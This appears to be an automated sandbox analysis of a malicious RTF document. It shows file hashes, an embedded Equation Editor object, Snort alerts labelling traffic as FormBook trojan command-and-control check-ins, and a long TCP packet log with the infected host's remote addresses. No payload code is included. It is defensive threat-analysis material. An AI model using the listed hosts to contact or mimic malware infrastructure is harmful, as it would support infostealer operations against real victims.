                                                    SHA512:d8beacb0e01df26d41812d4152ff8afe46c25e620d200af0e9d6a27b6f89cd4dc915d77ca2f4f3e04dc78ff43192a4d5b5e52674eef4a000a0cc35dc4ef0df22
                                                    SSDEEP:384:Ac8lCXedYICEJZv+c3zvYcK1CJ+8sgl+0nmhWnPo9lMVEdVACzl9Q2qmNj7aJ52E:AvcXe2ILvZ3tKtbvWbV1MQfEE
                                                    File Content Preview:{\rtf9511%[4&6)3?41/;?--4]?>?_8`?`*7$?/.7[=[=./.4%9~~'47*1,~:0'|?][0-.?'2??*)?0`9=%^'|_.~[|]_?@???*]`@14`#]*+=!3?.4?(|,??70?<^6%.%%725`4|9/<9:?&;|+'?<)4'.~]@%[,)+|?65>?7!0](;>#(=^|&?2$61(=6;9^?!9:.=%06#?#;|<?.?2|/;?81#'%<,|~..3]:?]`^*|&>_.6*`|(/[6]?.0(.51

                                                    File Icon

                                                    Icon Hash:e4eea2aaa4b4b4a4

                                                    Static RTF Info

                                                    Objects

                                                    Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
                                                    0 | 00001860h | | | | | | | | no
                                                    1 | 00001836h | 2 | embedded | equatiON.3 | 2142 | | | | no
                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                    09/28/21-20:44:09.686778 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49166 | 80 | 192.168.2.22 | 99.83.154.118
                                                    09/28/21-20:44:09.686778 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49166 | 80 | 192.168.2.22 | 99.83.154.118
                                                    09/28/21-20:44:09.686778 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49166 | 80 | 192.168.2.22 | 99.83.154.118
                                                    09/28/21-20:44:09.848998 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49166 | 99.83.154.118 | 192.168.2.22

                                                    Network Port Distribution

                                                    TCP Packets

                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    Sep 28, 2021 20:42:28.864219904 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864237070 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864317894 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864340067 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864366055 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864376068 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864382982 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864398003 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864423037 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864438057 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864521027 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864567041 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864590883 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864612103 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864633083 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864669085 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864763021 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864779949 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864803076 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864820004 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864836931 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864908934 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864976883 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.865014076 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.865197897 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.865222931 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.865225077 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.865226984 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.865236044 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.865292072 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.865320921 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.869268894 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.870656013 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.890470028 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.890497923 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.890517950 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.890556097 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.890577078 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.890604019 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.890624046 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.890628099 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.890644073 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.890645027 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.890646935 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.890659094 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.890665054 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.890671968 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.890686035 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.890697956 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.890711069 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.890718937 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.890733004 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.890742064 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.890759945 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.890801907 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.890836954 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.890881062 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.890914917 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.891242027 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.891264915 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.891285896 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.891298056 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.891305923 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.891308069 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.891319036 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.891330004 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.891355991 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.891380072 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.891401052 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.891422033 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.891442060 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.891455889 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.891463041 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.891484976 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.891504049 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.891529083 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.891532898 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.891550064 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.891562939 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.891570091 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.891591072 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.891593933 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.891612053 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.891633034 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.891654015 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.891664982 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.891674042 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.891699076 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.891710997 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.891737938 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.891746044 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.891760111 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.891781092 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.891805887 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.891841888 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.892368078 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.895963907 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.895988941 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.896014929 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.896091938 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.896123886 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.897208929 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.897227049 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.897243023 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.897339106 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.897356987 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.897371054 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.897383928 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.897433043 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.898272038 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.917349100 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.917387009 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.917414904 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.917490005 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.917515993 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.919095993 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.919167995 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.919178963 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.919224977 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.919249058 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.919264078 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.919275045 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.919308901 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.919315100 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.919358015 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.919362068 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.919401884 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.919405937 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.919444084 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.919446945 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.919483900 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.919486046 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.919519901 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.919523954 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.919558048 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.919564009 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.919596910 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.919625044 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.919661045 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.919668913 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.919703007 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.919718027 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.919754982 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.919760942 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.919794083 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.919799089 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.919838905 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.919846058 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.919886112 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.919886112 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.919923067 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.919924021 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.919960976 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.919964075 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.920001984 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.920002937 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.920052052 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.920079947 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.920097113 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.920097113 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.920134068 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.920137882 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.920173883 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.920181990 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.920223951 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.920227051 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.920259953 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.920267105 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.920300961 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.920305014 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.920341015 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.920341969 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.920378923 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.920386076 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.920419931 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.920423985 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.920459032 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.920464993 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.920502901 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.920509100 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.920552015 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.920553923 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.920593023 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.920597076 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.920634985 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.921103001 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.922693968 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.922781944 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.923775911 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.925153017 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.925173044 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.925175905 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.925184965 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.925216913 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.925225973 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.925228119 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.925230026 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.925278902 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.925280094 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.925323963 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.925326109 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.925360918 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.925364971 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.925396919 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.925400019 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.925442934 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.925760031 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.944266081 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.944343090 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.944346905 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.944386959 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.944403887 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.944447041 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.944473982 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.944514990 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.944539070 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.944577932 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.944595098 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.944633961 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.944649935 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.944688082 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.944705009 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.944744110 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.944763899 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.944804907 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.944824934 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.944873095 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977039099 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977046967 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977062941 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977072001 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977087975 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977097034 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977112055 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977118969 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977138996 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977143049 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977164030 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977170944 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977185011 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977196932 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977210045 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977216959 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977233887 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977242947 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977257967 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977273941 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977283001 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977291107 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977307081 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977317095 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977332115 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977333069 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977360010 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977369070 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977385998 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977394104 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977411032 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977421045 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977436066 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977443933 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977459908 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977468967 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977483988 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977494001 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977508068 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977518082 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977535009 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977543116 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977560043 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977571011 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977583885 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977607965 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977608919 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977622032 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977632999 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977634907 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977655888 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977670908 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977679968 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977700949 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977709055 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977719069 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977725029 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977737904 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977749109 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977756977 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977772951 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977787018 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977797031 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977802992 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977823019 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977833033 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977850914 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977859020 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977874994 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977891922 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977895975 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977916002 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977921963 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977935076 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977936983 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977957964 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977968931 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977977991 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.977993011 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.977999926 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.978012085 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.978024006 CEST8049165185.239.243.112192.168.2.22
